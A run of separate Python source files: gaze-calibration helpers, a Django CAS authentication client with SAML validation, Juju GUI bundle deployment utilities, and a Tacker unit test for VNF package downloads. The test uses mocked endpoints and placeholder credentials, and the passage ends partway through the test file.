Find video coordinate corresponding to gaze fixation at (0.5, 0.5)
'''
idx = -1
central_fix = np.array([np.NaN, np.NaN])
for ii in range(targets.shape[0]):
if targets[ii,0] == 0.5 and targets[ii,1] == 0.5:
idx = ii
central_fix = fixations[idx,:]
if idx < 0:
print('* Central fixation target not found')
central_fix = np.array([np.NaN, np.NaN])
return central_fix
def WriteGaze(gaze_csv, t, gaze_x, gaze_y, bline_x, bline_y):
'''
Write calibrated gaze to CSV file
'''
# Open calibrated gaze CSV file to write
try:
gaze_stream = open(gaze_csv, 'w')
except:
print('* Problem opening gaze CSV file to write - skipping')
return False
'''
Write gaze line to file
Timeseries in columns. Column order is:
0 : Time (s)
1 : Calibrated gaze x
2 : Calibrated gaze y
'''
for (tc,tt) in enumerate(t):
gaze_stream.write('%0.3f,%0.3f,%0.3f,%0.3f,%0.3f\n' %
(tt, gaze_x[tc], gaze_y[tc], bline_x[tc], bline_y[tc]))
# Close gaze CSV file
gaze_stream.close()
return True
def ReadGaze(gaze_csv):
'''
Read calibrated gaze timerseries from CSV file
'''
# Read time series in rows
gt = np.genfromtxt(gaze_csv, delimiter=',')
# Parse out array
t, gaze_x, gaze_y = gt[:,0], gt[:,1], gt[:,2]
return t, gaze_x, gaze_y
def PlotCalibration(res_dir, hmap, xedges, yedges, fixations):
'''
Plot the calibration heatmap and temporally sorted fixation labels
'''
# Create a new figure
fig = plt.figure(figsize = (6,6))
# Plot spatial heatmap with fixation centroids
plt.imshow(hmap, interpolation='nearest', aspect='equal',
extent=[xedges[0], xedges[-1], yedges[-1], yedges[0]])
# Fixation coordinate vectors
fx, fy = fixations[:,0], fixations[:,1]
# Overlay fixation centroids with temporal order labels
plt.scatter(fx, fy, c='w', s=40)
alignment = {'horizontalalignment':'center', 'verticalalignment':'center'}
for fc in np.arange(0,fx.shape[0]):
plt.text(fx[fc], fy[fc], '%d' % fc, backgroundcolor='w', color='k', **alignment)
# Save figure without displaying
plt.savefig(os.path.join(res_dir, 'cal_fix_space.png'), dpi=150, bbox_inches='tight')
# Close figure without showing it
plt.close(fig)
def WriteCalibration(ss_res_dir, fixations, C, central_fix):
'''
Write calibration matrix and fixations to CSV files in results subdirectory
'''
# Write calibration matrix to text file in results subdir
calmat_csv = os.path.join(ss_res_dir, 'calibration_matrix.csv')
# Write calibration matrix to CSV file
try:
np.savetxt(calmat_csv, C, delimiter=",")
except:
print('* Problem saving calibration matrix to CSV file - skipping')
return False
# Write calibration fixations in video space to results subdir
calfix_csv = os.path.join(ss_res_dir, 'calibration_fixations.csv')
# Write calibration fixations to CSV file
try:
np.savetxt(calfix_csv, fixations, delimiter=",")
except:
print('* Problem saving calibration fixations to CSV file - skipping')
return False
# Write central fixation in video space to results subdir
ctrfix_csv = os.path.join(ss_res_dir, 'central_fixation.csv')
# Write calibration fixations to CSV file
try:
np.savetxt(ctrfix_csv, central_fix, delimiter=",")
except:
print('* Problem saving central fixation to CSV file - skipping')
return False
return True
|
|
from django.conf import settings
from django.utils import six
from django.contrib.auth import get_user_model
from django.utils.six.moves import urllib_parse
from django.utils.six.moves.urllib_request import urlopen, Request
from uuid import uuid4
import datetime
import inspect
import importlib
"""
if settings.CAS_VERSION not in _PROTOCOLS:
raise ValueError('Unsupported CAS_VERSION %r' % settings.CAS_VERSION)
if settings.CAS_PROXY_CALLBACK and settings.CAS_VERSION not in ['2', '3']:
raise ValueError('proxy callback only supported by CAS_VERSION 2 and 3')
"""
class CASError(ValueError):
pass
class CASClient(object):
def __new__(self, *args, **kwargs):
version = kwargs.pop('version')
if version in (1, '1'):
return CASClientV1(*args, **kwargs)
elif version in (2, '2'):
return CASClientV2(*args, **kwargs)
elif version in (3, '3'):
return CASClientV3(*args, **kwargs)
elif version == 'CAS_2_SAML_1_0':
return CASClientWithSAMLV1(*args, **kwargs)
else:
cas_client_impl = version
try:
if isinstance(version, six.string_types):
module_name, class_name = cas_client_impl.rsplit(".", 1)
cas_client_impl = getattr(importlib.import_module(module_name), class_name)
if inspect.isclass(cas_client_impl):
return cas_client_impl(*args, **kwargs)
except:
# do nothing
pass
raise ValueError('Unsupported CAS_VERSION %r' % version)
class CASClientBase(object):
def __init__(self, service_url=None, server_url=None,
extra_login_params=None, renew=False,
username_attribute=None, proxy_callback=None):
if proxy_callback:
raise ValueError('Proxy callback not supported by this CASClient')
self.service_url = service_url
self.server_url = server_url
self.extra_login_params = extra_login_params or {}
self.renew = renew
self.username_attribute = username_attribute
pass
def verify_ticket(self, ticket):
"""Verify the given ticket.
Return (username, attributes, pgtiou) on success, or (None, None, None)
on failure.
"""
raise NotImplementedError()
def get_or_create_user(self, username, attributes):
"""get or create a user
Return (created, user).
The returned user can be `None`.
"""
if not username:
return None, False
User = get_user_model()
try:
user = User.objects.get(**{User.USERNAME_FIELD: username})
created = False
except User.DoesNotExist:
# check if we want to create new users, if we don't fail auth
create = getattr(settings, 'CAS_CREATE_USER', True)
if not create:
return None, False
# user will have an "unusable" password
user = User.objects.create_user(username, '')
user.save()
created = True
return created, user
def get_login_url(self):
"""Generates CAS login URL"""
params = {'service': self.service_url}
if self.renew:
params.update({'renew': 'true'})
params.update(self.extra_login_params)
url = urllib_parse.urljoin(self.server_url, 'login')
query = urllib_parse.urlencode(params)
return url + '?' + query
def _get_logout_redirect_parameter_name(self):
"""Return the parameter name to be used for passing the redirect_url
to the CAS logout page."""
# This parameter was named 'url' in CAS 2.0, but was renamed to
# service in later CAS versions.
return 'service'
def get_logout_url(self, redirect_url=None):
"""Generates CAS logout URL"""
url = urllib_parse.urljoin(self.server_url, 'logout')
if redirect_url:
param_name = self._get_logout_redirect_parameter_name()
url += '?' + urllib_parse.urlencode({param_name: redirect_url})
return url
def get_proxy_url(self, pgt):
"""Returns proxy url, given the proxy granting ticket"""
params = urllib_parse.urlencode({'pgt': pgt, 'targetService': self.get_service_url()})
return "%s/proxy?%s" % (self.server_url, params)
def get_proxy_ticket(self, pgt):
"""Returns proxy ticket given the proxy granting ticket"""
response = urlopen(self.get_proxy_url(pgt))
if response.code == 200:
from lxml import etree
root = etree.fromstring(response.read())
tickets = root.xpath(
"//cas:proxyTicket",
namespaces={"cas": "http://www.yale.edu/tp/cas"}
)
if len(tickets) == 1:
return tickets[0].text
errors = root.xpath(
"//cas:authenticationFailure",
namespaces={"cas": "http://www.yale.edu/tp/cas"}
)
if len(errors) == 1:
raise CASError(errors[0].attrib['code'], errors[0].text)
raise CASError("Bad http code %s" % response.code)
class CASClientV1(CASClientBase):
"""CAS Client Version 1"""
def verify_ticket(self, ticket):
"""Verifies CAS 1.0 authentication ticket."""
params = [('ticket', ticket), ('service', self.service)]
url = (urllib_parse.urljoin(self.server_url, 'validate') + '?' +
urllib_parse.urlencode(params))
page = urlopen(url)
try:
verified = page.readline().strip()
if verified == 'yes':
return page.readline().strip(), None, None
else:
return None, None, None
finally:
page.close()
def _get_logout_redirect_parameter_name(self):
return 'url'
class CASClientV2(CASClientBase):
"""CAS Client Version 2"""
def __init__(self, proxy_callback=None, *args, **kwargs):
"""proxy_callback is for V2 and V3 so V3 is subclass of V2"""
self.proxy_callback = proxy_callback
super(CASClientV2, self).__init__(*args, **kwargs)
def verify_ticket(self, ticket):
"""Verifies CAS 2.0+ XML-based authentication ticket."""
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
user = None
pgtiou = None
params = [('ticket', ticket), ('service', self.service_url)]
if self.proxy_callback:
params.append(('pgtUrl', self.proxy_callback))
url = (urllib_parse.urljoin(self.server_url, 'serviceValidate') + '?' +
urllib_parse.urlencode(params))
page = urlopen(url)
try:
response = page.read()
tree = ElementTree.fromstring(response)
if tree[0].tag.endswith('authenticationSuccess'):
for element in tree[0]:
if element.tag.endswith('user'):
user = element.text
elif element.tag.endswith('proxyGrantingTicket'):
pgtiou = element.text
return user, None, pgtiou
else:
return None, None, None
finally:
page.close()
def _get_logout_redirect_parameter_name(self):
return 'url'
class CASClientV3(CASClientV2):
"""CAS Client Version 3"""
def verify_ticket(self, ticket):
"""Verifies CAS 3.0+ XML-based authentication ticket and returns extended attributes."""
response = self.get_verification_response(ticket)
return self.verify_response(response)
def get_verification_response(self, ticket):
params = [('ticket', ticket), ('service', self.service_url)]
if self.proxy_callback:
params.append(('pgtUrl', self.proxy_callback))
base_url = urllib_parse.urljoin(self.server_url, 'proxyValidate')
url = base_url + '?' + urllib_parse.urlencode(params)
page = urlopen(url)
return page.read()
@classmethod
def verify_response(cls, response):
user = None
attributes = {}
pgtiou = None
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
tree = ElementTree.fromstring(response)
if tree[0].tag.endswith('authenticationSuccess'):
for element in tree[0]:
if element.tag.endswith('user'):
user = element.text
elif element.tag.endswith('proxyGrantingTicket'):
pgtiou = element.text
elif element.tag.endswith('attributes'):
for attribute in element:
tag = attribute.tag.split("}").pop()
if tag in attributes:
if isinstance(attributes[tag], list):
attributes[tag].append(attribute.text)
else:
attributes[tag] = [attributes[tag]]
attributes[tag].append(attribute.text)
else:
attributes[tag] = attribute.text
return user, attributes, pgtiou
def _get_logout_redirect_parameter_name(self):
return 'service'
SAML_1_0_NS = 'urn:oasis:names:tc:SAML:1.0:'
SAML_1_0_PROTOCOL_NS = '{' + SAML_1_0_NS + 'protocol' + '}'
SAML_1_0_ASSERTION_NS = '{' + SAML_1_0_NS + 'assertion' + '}'
SAML_ASSERTION_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<samlp:Request xmlns:samlp="urn:oasis:names:tc:SAML:1.0:protocol"
MajorVersion="1"
MinorVersion="1"
RequestID="{request_id}"
IssueInstant="{timestamp}">
<samlp:AssertionArtifact>{ticket}</samlp:AssertionArtifact></samlp:Request>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
class CASClientWithSAMLV1(CASClientBase):
"""CASClient 3.0+ with SAML"""
def verify_ticket(self, ticket):
"""Verifies CAS 3.0+ XML-based authentication ticket and returns extended attributes.
@date: 2011-11-30
@author: Carlos Gonzalez Vila <carlewis@gmail.com>
"""
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
page = self.fetch_saml_validation(ticket)
try:
user = None
attributes = {}
response = page.read()
tree = ElementTree.fromstring(response)
# Find the authentication status
success = tree.find('.//' + SAML_1_0_PROTOCOL_NS + 'StatusCode')
if success is not None and success.attrib['Value'].endswith(':Success'):
# User is validated
attrs = tree.findall('.//' + SAML_1_0_ASSERTION_NS + 'Attribute')
for at in attrs:
if self.username_attribute in list(at.attrib.values()):
user = at.find(SAML_1_0_ASSERTION_NS + 'AttributeValue').text
attributes['uid'] = user
values = at.findall(SAML_1_0_ASSERTION_NS + 'AttributeValue')
if len(values) > 1:
values_array = []
for v in values:
values_array.append(v.text)
attributes[at.attrib['AttributeName']] = values_array
else:
attributes[at.attrib['AttributeName']] = values[0].text
return user, attributes, None
finally:
page.close()
def fetch_saml_validation(self, ticket):
# We do the SAML validation
headers = {
'soapaction': 'http://www.oasis-open.org/committees/security',
'cache-control': 'no-cache',
'pragma': 'no-cache',
'accept': 'text/xml',
'connection': 'keep-alive',
'content-type': 'text/xml; charset=utf-8',
}
params = [('TARGET', self.service_url)]
saml_validate_url = urllib_parse.urljoin(
self.server_url, 'samlValidate',
)
request = Request(
saml_validate_url + '?' + urllib_parse.urlencode(params),
self.get_saml_assertion(ticket),
headers,
)
page = urlopen(request)
return page
@classmethod
def get_saml_assertion(cls, ticket):
"""
http://www.jasig.org/cas/protocol#samlvalidate-cas-3.0
SAML request values:
RequestID [REQUIRED]:
unique identifier for the request
IssueInstant [REQUIRED]:
timestamp of the request
samlp:AssertionArtifact [REQUIRED]:
the valid CAS Service Ticket obtained as a response parameter at login.
"""
# RequestID [REQUIRED] - unique identifier for the request
request_id = uuid4()
# e.g. 2014-06-02T09:21:03.071189
timestamp = datetime.datetime.now().isoformat()
return SAML_ASSERTION_TEMPLATE.format(
request_id=request_id,
timestamp=timestamp,
ticket=ticket,
).encode('utf8')
@classmethod
def get_saml_slos(cls, logout_request):
"""returns saml logout ticket info"""
from lxml import etree
try:
root = etree.fromstring(logout_request)
return root.xpath(
"//samlp:SessionIndex",
namespaces={'samlp': "urn:oasis:names:tc:SAML:2.0:protocol"})
except etree.XMLSyntaxError:
pass
def _get_logout_redirect_parameter_name(self):
return 'service'
|
|
# This file is part of the Juju GUI, which lets users view and manage Juju
# environments within a graphical interface (https://launchpad.net/juju-gui).
# Copyright (C) 2013 Canonical Ltd.
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License version 3, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranties of MERCHANTABILITY,
# SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Bundle deployment utility functions and objects."""
import collections
from functools import wraps
import itertools
import logging
import time
import urllib
from tornado import (
gen,
escape,
)
from tornado.httpclient import AsyncHTTPClient
from guiserver.watchers import AsyncWatcher
from jujuclient import EnvError
# Change statuses.
SCHEDULED = 'scheduled'
STARTED = 'started'
CANCELLED = 'cancelled'
COMPLETED = 'completed'
# Define a sequence of allowed constraints to be used in the process of
# preparing the bundle object. See the _prepare_constraints function below.
ALLOWED_CONSTRAINTS = ('arch', 'cpu-cores', 'cpu-power', 'mem')
def create_change(deployment_id, status, queue=None, error=None):
"""Return a dict representing a deployment change.
The resulting dict contains at least the following fields:
- DeploymentId: the deployment identifier;
- Status: the deployment's current status;
- Time: the time in seconds since the epoch as an int.
These optional fields can also be present:
- Queue: the deployment position in the queue at the time of this change;
- Error: a message describing an error occurred during the deployment.
"""
result = {
'DeploymentId': deployment_id,
'Status': status,
'Time': int(time.time()),
}
if queue is not None:
result['Queue'] = queue
if error is not None:
result['Error'] = error
return result
def message_from_error(exception):
"""Return a (possibly) human readable message from the given exception.
Also log the error message to the log file.
"""
logging.error('error deploying the bundle')
logging.error('error type: {}'.format(type(exception)))
if isinstance(exception, EnvError):
message = exception.message.strip()
else:
message = str(exception).strip()
if message:
logging.error('error message: {}'.format(message))
else:
logging.error('empty error message')
message = 'no further details can be provided'
return message
class Observer(object):
"""Handle multiple deployment watchers."""
def __init__(self):
# Map deployment identifiers to watchers.
self.deployments = {}
# Map watcher identifiers to deployment identifiers.
self.watchers = {}
# This counter is used to generate deployment identifiers.
self._deployment_counter = itertools.count()
# This counter is used to generate watcher identifiers.
self._watcher_counter = itertools.count()
def add_deployment(self):
"""Start observing a deployment.
Generate a deployment id and add it to self.deployments.
Return the generated deployment id.
"""
deployment_id = self._deployment_counter.next()
self.deployments[deployment_id] = AsyncWatcher()
logging.info('deployment {} scheduled'.format(deployment_id))
return deployment_id
def add_watcher(self, deployment_id):
"""Return a new watcher id for the given deployment id.
Also add the generated watcher id to self.watchers.
"""
watcher_id = self._watcher_counter.next()
self.watchers[watcher_id] = deployment_id
logging.debug('deployment {} observed by watcher {}'.format(
deployment_id, watcher_id))
return watcher_id
def notify_position(self, deployment_id, position):
"""Add a change to the deployment watcher notifying a new position.
If the position in the queue is 0, it means the deployment is started
or about to start. Therefore set its status to STARTED.
"""
watcher = self.deployments[deployment_id]
status = SCHEDULED if position else STARTED
change = create_change(deployment_id, status, queue=position)
watcher.put(change)
logging.debug('deployment {} now in position {}'.format(
deployment_id, position))
def notify_cancelled(self, deployment_id):
"""Add a change to the deployment watcher notifying it is cancelled."""
watcher = self.deployments[deployment_id]
change = create_change(deployment_id, CANCELLED)
watcher.close(change)
logging.info('deployment {} cancelled'.format(deployment_id))
def notify_completed(self, deployment_id, error=None):
"""Add a change to the deployment watcher notifying it is completed."""
watcher = self.deployments[deployment_id]
change = create_change(deployment_id, COMPLETED, error=error)
watcher.close(change)
logging.info('deployment {} completed'.format(deployment_id))
def _prepare_constraints(constraints):
"""Validate and prepare the given service constraints.
If constraints are passed as a string, convert them to be a dict.
Return the validated constraints dict.
Raise a ValueError if unsupported constraints are present.
"""
if not isinstance(constraints, collections.Mapping):
try:
constraints = dict(i.split('=') for i in constraints.split(','))
except ValueError:
# A ValueError is raised if constraints are invalid, e.g. "cpu=,".
raise ValueError('invalid constraints: {}'.format(constraints))
unsupported = set(constraints).difference(ALLOWED_CONSTRAINTS)
if unsupported:
msg = 'unsupported constraints: {}'.format(
', '.join(sorted(unsupported)))
raise ValueError(msg)
return constraints
def prepare_bundle(bundle):
"""Validate and prepare the bundle.
In particular, convert the service constraints, if they are present and if
they are represented as a string, to a dict, as expected by the deployer.
Modify in place the given YAML decoded bundle dictionary.
Return None if everything is ok.
Raise a ValueError if:
- the bundle is not well structured;
- the bundle does not include services;
- the bundle includes unsupported constraints.
"""
# XXX frankban 2013-11-07: is the GUI Server in charge of validating the
# bundles? For now, the weak checks below should be enough.
if not isinstance(bundle, collections.Mapping):
raise ValueError('the bundle data is not well formed')
services = bundle.get('services')
if not isinstance(services, collections.Mapping):
raise ValueError('the bundle does not contain any services')
# Handle services' constraints.
for service_data in services.values():
if 'constraints' in service_data:
constraints = service_data['constraints']
if not constraints:
# If constraints is an empty string, just delete the key.
del service_data['constraints']
else:
# Otherwise sanitize the value.
service_data['constraints'] = _prepare_constraints(constraints)
def require_authenticated_user(view):
"""Require the user to be authenticated when executing the decorated view.
This function can be used to decorate bundle views. Each view receives
a request and a deployer, and the user instance is stored in request.user.
If the user is not authenticated an error response is raised when calling
the view. Otherwise, the view is executed normally.
"""
@wraps(view)
def decorated(request, deployer):
if not request.user.is_authenticated:
raise response(error='unauthorized access: no user logged in')
return view(request, deployer)
return decorated
def response(info=None, error=None):
"""Create a response containing the given (optional) info and error values.
This function is intended to be used by bundles views.
Return a gen.Return instance, so that the result of this method can easily
be raised from coroutines.
"""
if info is None:
info = {}
data = {'Response': info}
if error is not None:
logging.error('deployer: {}'.format(escape.utf8(error)))
data['Error'] = error
return gen.Return(data)
@gen.coroutine
def increment_deployment_counter(bundle_id, charmworld_url):
"""Increment the deployment count in Charmworld.
If the call to Charmworld fails we log the error but don't report it.
This counter is a 'best effort' attempt but it will not impede our
deployment of the bundle.
Arguments are:
- bundle_id: the ID for the bundle in Charmworld.
- charmworld_url: the URL for charmworld, including the protocol.
If None, do nothing.
Returns True if the counter is successfully incremented else False.
"""
if charmworld_url is None:
raise gen.Return(False)
if not all((isinstance(bundle_id, basestring),
isinstance(charmworld_url, basestring))):
raise gen.Return(False)
path = 'metric/deployments/increment'
url = u'{}api/3/bundle/{}/{}'.format(
charmworld_url,
urllib.quote(bundle_id), path)
logging.info('Incrementing bundle deployment count using\n{}.'.format(
url.encode('utf-8')))
client = AsyncHTTPClient()
# We use a GET instead of a POST since there is not request body.
try:
resp = yield client.fetch(url, callback=None)
except Exception as exc:
logging.error('Attempt to increment deployment counter failed.')
logging.error('URL: {}'.format(url))
logging.exception(exc)
raise gen.Return(False)
success = bool(resp.code == 200)
raise gen.Return(success)
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import datetime
import hashlib
import io
import json
import os
import requests
import shutil
import tempfile
import uuid
import zipfile
import ddt
from oslo_config import cfg
from requests_mock.contrib import fixture as requests_mock_fixture
from tacker import auth
from tacker.tests import base
from tacker.tests.unit.vnfm.infra_drivers.openstack.fixture_data import client
from tacker.tests.unit.vnfpkgm import fakes
from tacker.tests import utils
from tacker.tests import uuidsentinel
import tacker.vnfm.nfvo_client as nfvo_client
from unittest import mock
def _count_mock_history(history, *url):
req_count = 0
for mock_history in history:
actual_url = '{}://{}'.format(mock_history.scheme,
mock_history.hostname)
if actual_url in url:
req_count += 1
return req_count
@ddt.ddt
class TestVnfPackageRequest(base.BaseTestCase):
client_fixture_class = client.ClientFixture
sdk_connection_fixure_class = client.SdkConnectionFixture
def setUp(self):
super(TestVnfPackageRequest, self).setUp()
self.requests_mock = self.useFixture(requests_mock_fixture.Fixture())
self.url = "http://nfvo.co.jp/vnfpkgm/v1/vnf_packages"
self.nfvo_url = "http://nfvo.co.jp"
self.test_package_dir = 'tacker/tests/unit/vnfm/'
self.headers = {'Content-Type': 'application/json'}
self.token_endpoint = 'https://oauth2/tokens'
self.oauth_url = 'https://oauth2'
self.auth_user_name = 'test_user'
self.auth_password = 'test_password'
cfg.CONF.set_override('auth_type', None,
group='authentication')
cfg.CONF.set_override(
"base_url",
self.url,
group='connect_vnf_packages')
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=[
"package_content",
"vnfd"])
cfg.CONF.set_override('user_name', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('password', self.auth_password,
group='authentication')
cfg.CONF.set_override('token_endpoint', self.token_endpoint,
group='authentication')
cfg.CONF.set_override('client_id', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('client_password', self.auth_password,
group='authentication')
auth.auth_manager = auth._AuthManager()
nfvo_client.VnfPackageRequest._connector = nfvo_client._Connect(
2, 1, 20)
def tearDown(self):
super(TestVnfPackageRequest, self).tearDown()
self.addCleanup(mock.patch.stopall)
def assert_auth_basic(self, acutual_request):
actual_auth = acutual_request._request.headers.get("Authorization")
expected_auth = base64.b64encode(
'{}:{}'.format(
self.auth_user_name,
self.auth_password).encode('utf-8')).decode()
self.assertEqual("Basic " + expected_auth, actual_auth)
def assert_auth_client_credentials(self, acutual_request, expected_token):
actual_auth = acutual_request._request.headers.get(
"Authorization")
self.assertEqual("Bearer " + expected_token, actual_auth)
def assert_zipfile(
self,
actual_zip,
expected_zips,
expected_artifacts=None):
expected_artifacts = expected_artifacts if expected_artifacts else []
def check_zip(expected_zip):
self.assertIsInstance(expected_zip, zipfile.ZipFile)
for expected_name in expected_zip.namelist():
expected_checksum = hashlib.sha256(
expected_zip.read(expected_name)).hexdigest()
actual_checksum = hashlib.sha256(
actual_zip.read(expected_name)).hexdigest()
self.assertEqual(expected_checksum, actual_checksum)
try:
self.assertIsInstance(actual_zip, zipfile.ZipFile)
self.assertIsNone(actual_zip.testzip())
expected_elm_cnt = sum(
map(lambda x: len(x.namelist()), expected_zips))
self.assertEqual(expected_elm_cnt +
len(expected_artifacts), len(actual_zip.namelist()))
for expected_zip in expected_zips:
check_zip(expected_zip)
for expected_artifact in expected_artifacts:
expected_checksum = hashlib.sha256(
open(expected_artifact, 'rb').read()).hexdigest()
actual_checksum = hashlib.sha256(
actual_zip.read(expected_artifact)).hexdigest()
self.assertEqual(expected_checksum, actual_checksum)
except Exception as e:
self.fail(e)
def json_serial_date_to_dict(self, json_obj):
def json_serial(obj):
if isinstance(obj, datetime.datetime):
return obj.isoformat()
raise TypeError("Type %s not serializable" % type(obj))
serial_json_str = json.dumps(json_obj, default=json_serial)
return json.loads(serial_json_str)
def test_init(self):
self.assertEqual(self.url, cfg.CONF.connect_vnf_packages.base_url)
self.assertEqual(["package_content", "vnfd"],
cfg.CONF.connect_vnf_packages.pipeline)
self.assertEqual(2, cfg.CONF.connect_vnf_packages.retry_num)
self.assertEqual(30, cfg.CONF.connect_vnf_packages.retry_wait)
self.assertEqual(20, cfg.CONF.connect_vnf_packages.timeout)
def _make_zip_file_from_sample(self, dir_name, read_vnfd_only=False):
unique_name = str(uuid.uuid4())
temp_dir = os.path.join('/tmp', unique_name)
utils.copy_csar_files(temp_dir, dir_name, read_vnfd_only)
tempfd, temp_filepath = tempfile.mkstemp(suffix=".zip", dir=temp_dir)
os.close(tempfd)
zipfile.ZipFile(temp_filepath, 'w')
self.addCleanup(shutil.rmtree, temp_dir)
return temp_filepath
@ddt.data({'content': 'vnfpkgm1',
'vnfd': None,
'artifacts': None},
{'content': None,
'vnfd': 'vnfpkgm2',
'artifacts': None},
{'content': None,
'vnfd': None,
'artifacts': ["vnfd_lcm_user_data.yaml"]},
{'content': 'vnfpkgm1',
'vnfd': 'vnfpkgm2',
'artifacts': ["vnfd_lcm_user_data.yaml"]},
{'content': 'vnfpkgm1',
'vnfd': None,
'artifacts': None},
{'content': None,
'vnfd': 'vnfpkgm2',
'artifacts': ["vnfd_lcm_user_data.yaml"]},
{'content': 'vnfpkgm1',
'vnfd': 'vnfpkgm2',
'artifacts': ["vnfd_lcm_user_data.yaml"]},
)
@ddt.unpack
def test_download_vnf_packages(self, content, vnfd, artifacts):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
expected_connect_cnt = 0
pipelines = []
if content:
expected_connect_cnt += 1
pipelines.append('package_content')
path = self._make_zip_file_from_sample(content)
with open(path, 'rb') as test_package_content_zip_obj:
expected_package_content_zip = zipfile.ZipFile(
io.BytesIO(test_package_content_zip_obj.read()))
test_package_content_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
content=test_package_content_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
if vnfd:
expected_connect_cnt += 1
pipelines.append('vnfd')
path = self._make_zip_file_from_sample(vnfd, read_vnfd_only=True)
with open(path, 'rb') as test_vnfd_zip_obj:
expected_vnfd_zip = zipfile.ZipFile(
io.BytesIO(test_vnfd_zip_obj.read()))
test_vnfd_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_vnfd_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
if artifacts:
pipelines.append('artifacts')
artifacts = [os.path.join("tacker/tests/etc/samples", p)
for p in artifacts]
for artifact_path in artifacts:
expected_connect_cnt += 1
with open(artifact_path, 'rb') as artifact_path_obj:
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'artifacts',
artifact_path),
headers={
'Content-Type': 'application/octet-stream'},
status_code=200,
content=artifact_path_obj.read())
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=pipelines)
if artifacts:
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id, artifacts)
else:
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertIsInstance(res, io.BytesIO)
actual_zip = zipfile.ZipFile(res)
if content and vnfd:
self.assert_zipfile(
actual_zip, [
expected_package_content_zip,
expected_vnfd_zip],
artifacts)
elif content:
self.assert_zipfile(
actual_zip, [expected_package_content_zip], artifacts)
elif vnfd:
self.assert_zipfile(
actual_zip, [expected_vnfd_zip], artifacts)
else:
self.assert_zipfile(
actual_zip, [], artifacts)
self.assertEqual(expected_connect_cnt, req_count)
def test_download_vnf_packages_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
expected_connect_cnt = \
self._download_vnf_packages_all_pipeline_with_assert()
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(expected_connect_cnt, req_count)
for h in history:
self.assert_auth_basic(h)
def test_download_vnf_packages_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
expected_connect_cnt = 1
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
expected_connect_cnt += \
self._download_vnf_packages_all_pipeline_with_assert()
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(expected_connect_cnt, req_count)
self.assert_auth_basic(history[0])
for h in history[1:]:
self.assert_auth_client_credentials(h, "test_token")
def _download_vnf_packages_all_pipeline_with_assert(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
expected_connect_cnt = 0
pipelines = []
content = 'vnfpkgm1'
expected_connect_cnt += 1
pipelines.append('package_content')
path = self._make_zip_file_from_sample(content)
with open(path, 'rb') as test_package_content_zip_obj:
expected_package_content_zip = zipfile.ZipFile(
io.BytesIO(test_package_content_zip_obj.read()))
test_package_content_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
content=test_package_content_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
vnfd = 'vnfpkgm2'
expected_connect_cnt += 1
pipelines.append('vnfd')
path = self._make_zip_file_from_sample(vnfd, read_vnfd_only=True)
with open(path, 'rb') as test_vnfd_zip_obj:
expected_vnfd_zip = zipfile.ZipFile(
io.BytesIO(test_vnfd_zip_obj.read()))
test_vnfd_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_vnfd_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
artifacts = ["vnfd_lcm_user_data.yaml"]
pipelines.append('artifacts')
artifacts = [os.path.join("tacker/tests/etc/samples", p)
for p in artifacts]
for artifact_path in artifacts:
expected_connect_cnt += 1
with open(artifact_path, 'rb') as artifact_path_obj:
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'artifacts',
artifact_path),
headers={
'Content-Type': 'application/octet-stream'},
status_code=200,
content=artifact_path_obj.read())
cfg.CONF.set_default(
name='pipeline',
